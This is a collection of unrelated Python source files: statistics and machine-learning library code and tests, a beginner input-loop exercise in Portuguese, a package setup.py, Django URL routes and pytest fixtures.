    def rvs(self, size):
        """
        Samples the composite probability distribution

        Parameters
        ----------
        size: int
            number of samples to take

        Returns
        -------
        xs: numpy.ndarray, float
            samples from the PDF
        """
        # choose a component for every draw, then sample each component in bulk
        groups = np.random.choice(self.component_range, size, p=self.coefficients)
        u, counts = np.unique(groups, return_counts=True)
        samples = np.empty(0)
        for i in range(len(u)):
            samples = np.append(samples, self.functions[u[i]].rvs(counts[i]))
        return np.array(samples).flatten()

    def ppf(self, cdfs, ivals=None):
        """
        Evaluates the composite PPF at locations

        Parameters
        ----------
        cdfs: float or numpy.ndarray, float
            value(s) at which to find quantiles
        ivals: float or numpy.ndarray, float
            initial guesses for quantiles

        Returns
        -------
        xs: float or numpy.ndarray, float
            quantiles
        """
        N = np.shape(cdfs)[0]
        xs = np.zeros(N)
        if ivals is not None:
            xs0 = ivals
        else:
            # initial guess: average of the component-wise quantiles
            all_cdfs = np.zeros(N)
            for c in self.component_range:
                all_cdfs += self.functions[c].ppf(cdfs)
            xs0 = all_cdfs / self.n_components
        for n in range(N):
            def ppf_helper(x):
                # Bug fix: return a true Python scalar. SciPy deprecates
                # objective functions that return size-1 arrays.
                return np.absolute(cdfs[n] - self.cdf(x)).item()
            res = op.minimize(ppf_helper, xs0[n], method="Nelder-Mead", options={"maxfev": 1e5, "maxiter":1e5}, tol=1e-8)
            # res = op.basinhopping(ppf_helper, xs0[n])#, method="Nelder-Mead", options={"maxfev": 1e5, "maxiter":1e5})
            # Bug fix: res.x is a length-1 array; `xs[n] += res.x` relied on
            # implicit size-1-array-to-scalar conversion, which was removed
            # in NumPy >= 1.25. Extract the scalar explicitly.
            xs[n] = res.x.item()
        return xs
| 3,820 | 1,115 |
# Copyright 2020 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
import tensorflow as tf
import fastestimator as fe
import fastestimator.test.unittest_util as fet
class TestReflectionPadding2D(unittest.TestCase):
    """Checks ReflectionPadding2D output against hand-computed reflections."""

    def setUp(self):
        # A single 3x3 one-channel image holding the values 0..8 row by row.
        self.x = tf.reshape(tf.convert_to_tensor(list(range(9))), (1, 3, 3, 1))

    def test_reflection_padding_2d_double_side(self):
        layer = fe.layers.tensorflow.ReflectionPadding2D((1, 1))
        padded = layer(self.x)
        expected = tf.constant([[[[4], [3], [4], [5], [4]], [[1], [0], [1], [2], [1]], [[4], [3], [4], [5], [4]],
                                 [[7], [6], [7], [8], [7]], [[4], [3], [4], [5], [4]]]])
        self.assertTrue(fet.is_equal(padded, expected))

    def test_reflection_padding_2d_single_side(self):
        layer = fe.layers.tensorflow.ReflectionPadding2D((1, 0))
        padded = layer(self.x)
        expected = tf.constant([[[[1], [0], [1], [2], [1]], [[4], [3], [4], [5], [4]], [[7], [6], [7], [8], [7]]]])
        self.assertTrue(fet.is_equal(padded, expected))
| 1,628 | 568 |
'''Crie um programa que leia vários números inteiros pelo teclado.
O programa só vai parar quando o usuário digitar o valor 999,
que é a condição de parada. No final, mostre quantos números
foram digitados e qual foi a soma entre eles (desconsiderando o flag). '''
# Bug fix: the old banner print("Descubra a senha!") ("Discover the
# password!") was a copy-paste leftover from a different exercise and has
# been removed; it had nothing to do with this program.
cont = soma = 0  # count of typed numbers and their running sum
n = int(input("Digite um numero: "))
while n != 999:  # 999 is the stop flag and is excluded from the totals
    cont += 1
    soma += n
    n = int(input("Digite um numero: "))
print("Voce digitou {} e a soma total é {} dos numeros digitados.".format(cont, soma))
| 533 | 193 |
# -*- coding: utf-8 -*-
# DO NOT EDIT THIS FILE!
# This file has been autogenerated by dephell <3
# https://github.com/dephell/dephell
# Prefer setuptools; fall back to distutils on minimal Python installations.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup
import os.path
# Use README.rst (when shipped alongside this file) as the long description;
# otherwise fall back to an empty string.
readme = ''
here = os.path.abspath(os.path.dirname(__file__))
readme_path = os.path.join(here, 'README.rst')
if os.path.exists(readme_path):
    with open(readme_path, 'rb') as stream:
        readme = stream.read().decode('utf8')
# Package metadata autogenerated by dephell -- do not hand-edit values here.
# NOTE(review): project_urls point at github.com/kritarthh while the author
# fields name patarapolw -- confirm which origin is canonical.
setup(
    long_description=readme,
    name='str2port',
    version='0.1.1',
    description='Convert string to md5 hash, then to port number. No randomization involved.',
    project_urls={
        "homepage": "https://github.com/kritarthh/str2port", "repository": "https://github.com/kritarthh/str2port"},
    author='Pacharapol Withayasakpunt',
    author_email='patarapolw@gmail.com',
    license='MIT',
    entry_points={"console_scripts": ["str2port = str2port.__main__:cli"]},
    packages=['str2port'],
    package_dir={"": "."},
    package_data={"str2port": ["*.csv"]},
    install_requires=['click==7.*,>=7.0.0'],
)
| 1,112 | 404 |
from django.conf.urls import url
from . import views
urlpatterns = [
    url(r'^$', views.index, name='index'),
    url(r'^login/$', views.login, name='login'),
    url(r'^logout/$', views.logout, name='logout'),
    url(r'^update/$', views.update, name='update'),
    url(r'^update-password/$', views.update_password, name='update-password'),
    url(r'^recipes/$', views.recipes, name='recipes'),
    url(r'^signup/$', views.signup, name='signup'),
    # Bug fix: this route previously reused name='recipes', which shadowed
    # the recipes URL in reverse()/{% url %} lookups (Django resolves
    # duplicate names to the last match). Give favourites its own name.
    url(r'^favourites/$', views.favourites, name='favourites'),
]
| 516 | 190 |
from tensorflow_probability import edward2 as ed
import tensorflow as tf
import pytest
import pymc4 as pm
from pymc4.model.base import Config
# pylint: disable=unused-variable, unused-argument
# pylint: disable-msg=E0102
def test_model_definition_type1():
    # Defining a model through the @model.define decorator should register
    # every named random variable on the model object.
    model = pm.Model(name="testName")

    @model.define
    def simple(cfg):
        ed.Normal(0., 1., name='normal')

    assert model.name == "testName"
    assert 'normal' in model.variables
    assert model.variables['normal'].shape.as_list() == []
def test_model_definition_type2():
    # Referencing an unknown cfg key inside the definition raises a KeyError
    # whose message hints at the missing keyword.
    with pytest.raises(KeyError) as e:
        @pm.inline
        def model(cfg):
            ed.Normal(0., 1., name='normal', sample_shape=cfg.shape_for_normal)
    assert e.match('you probably need to pass "shape_for_normal" in model definition')

    # Supplying the key via pm.inline(...) makes the same definition valid.
    @pm.inline(shape_for_normal=(10,))  # pylint: disable-msg=E1120
    def model(cfg):
        ed.Normal(0., 1., name='normal', sample_shape=cfg.shape_for_normal)
    assert 'normal' in model.variables
    assert model.variables['normal'].shape.as_list() == [10]
def test_model_reconfigure():
    # configure() should rebuild the model's variables with the new shape.
    @pm.inline(shape_for_normal=(10,))  # pylint: disable-msg=E1120
    def model(cfg):
        ed.Normal(0., 1., name='normal', sample_shape=cfg.shape_for_normal)

    assert 'normal' in model.variables
    assert model.variables['normal'].shape.as_list() == [10]

    model.configure(shape_for_normal=3)
    assert model.variables['normal'].shape.as_list() == [3]
def test_testvalue():
    @pm.inline
    def model(cfg):
        ed.Normal(0., 1., name='normal')

    # The mode-based test point is deterministic (the Normal's mode is 0),
    # while a sampled test point should differ from it almost surely.
    sampled = model.test_point()
    at_mode = model.test_point(sample=False)
    assert at_mode['normal'] == 0.
    assert at_mode['normal'] != sampled['normal']
def test_variables():
    # A single named random variable appears in both the variables and the
    # unobserved collections.
    model = pm.Model()

    @model.define
    def simple(cfg):
        ed.Normal(0., 1., name='normal')

    assert "normal" in model.variables
    assert len(model.variables) == 1
    assert len(model.unobserved) == 1
def test_model_target_log_prob_fn():
    # Smoke test: building the target log-probability function of a model
    # with a single Normal should not raise.
    model = pm.Model()
    @model.define
    def simple(cfg):
        ed.Normal(0., 1., name='normal')
    model.target_log_prob_fn()
def test_model_observe():
    # Observing a variable moves it from the unobserved to the observed set.
    model = pm.Model()

    @model.define
    def simple(cfg):
        ed.Normal(0., 1., name='normal')

    model.observe(normal=1)
    assert not model.unobserved
    assert len(model.observed) == 1
def test_model_reset():
    # reset() should undo observe(), returning the variable to unobserved.
    model = pm.Model()

    @model.define
    def simple(cfg):
        ed.Normal(0., 1., name='normal')

    model.observe(normal=1)
    assert not model.unobserved
    assert len(model.observed) == 1

    model.reset()
    assert len(model.unobserved) == 1
    assert not model.observed
def test_model_session():
    # A model exposes a TensorFlow Session through its `session` attribute.
    model = pm.Model()
    @model.define
    def simple(cfg):
        ed.Normal(0., 1., name='normal')
    assert isinstance(model.session, tf.Session)
def test_model_config():
    # A model created without keyword arguments has an empty config.
    model = pm.Model()
    assert model.cfg == {}
    # Keyword arguments become config entries visible inside the definition.
    # NOTE(review): the in-body asserts below only fire if model.define
    # executes the definition eagerly -- presumably it does; verify against
    # pm.Model.define.
    model = pm.Model(var1=123)
    @model.define
    def simple(cfg):
        assert cfg["var1"] == 123
    model = pm.Model(var1=123)
    @model.define
    def simple(cfg):
        pass
    # configure() updates the config seen by a subsequent redefinition.
    model = model.configure(var1=12)
    @model.define
    def simple(cfg):
        assert cfg["var1"] == 12
def test_model_log_prob_fn():
    # log N(x=0 | mu=0, sigma=1) = -0.5 * log(2*pi) ~= -0.91893853
    model = pm.Model()
    @model.define
    def simple(cfg):
        mu = ed.Normal(0., 1., name="mu")
    log_prob_fn = model.target_log_prob_fn()
    with tf.Session():
        assert -0.91893853 == pytest.approx(log_prob_fn(0).eval(), 0.00001)
| 3,564 | 1,276 |
"""
Global fixtures to be reused.
"""
from __future__ import absolute_import
import sys
import mock
import pytest
import test.common as tc
@pytest.fixture(scope='session', autouse=True)
def setup_test_bed(request):
    """
    Fixture sets up the testing environment for this web application.
    Session scope, executes before all tests.
    """
    # Register the teardown callback before running setup so the environment
    # is cleaned up even if env_setup() fails partway through.
    request.addfinalizer(tc.env_teardown)
    tc.env_setup()
@pytest.yield_fixture()
def mock_print():
    """
    A fixture that mocks python's print function during the test.
    """
    # Python 2 exposes print through __builtin__, Python 3 through builtins.
    target = '__builtin__.print' if sys.version_info < (3, 0) else 'builtins.print'
    with mock.patch(target) as mock_obj:
        yield mock_obj
@pytest.yield_fixture()
def mock_input():
    """
    A fixture that mocks python's input function during the test
    (raw_input on Python 2).
    """
    target = '__builtin__.raw_input' if sys.version_info < (3, 0) else 'builtins.input'
    with mock.patch(target) as mock_obj:
        yield mock_obj
# @pytest.yield_fixture(scope='function', autouse=True)
# def around_all_tests():
# """
# Executes before and after EVERY test.
# Can be helpful for tracking bugs impacting test bed.
# """
# # before
# yield
# # after
| 1,285 | 429 |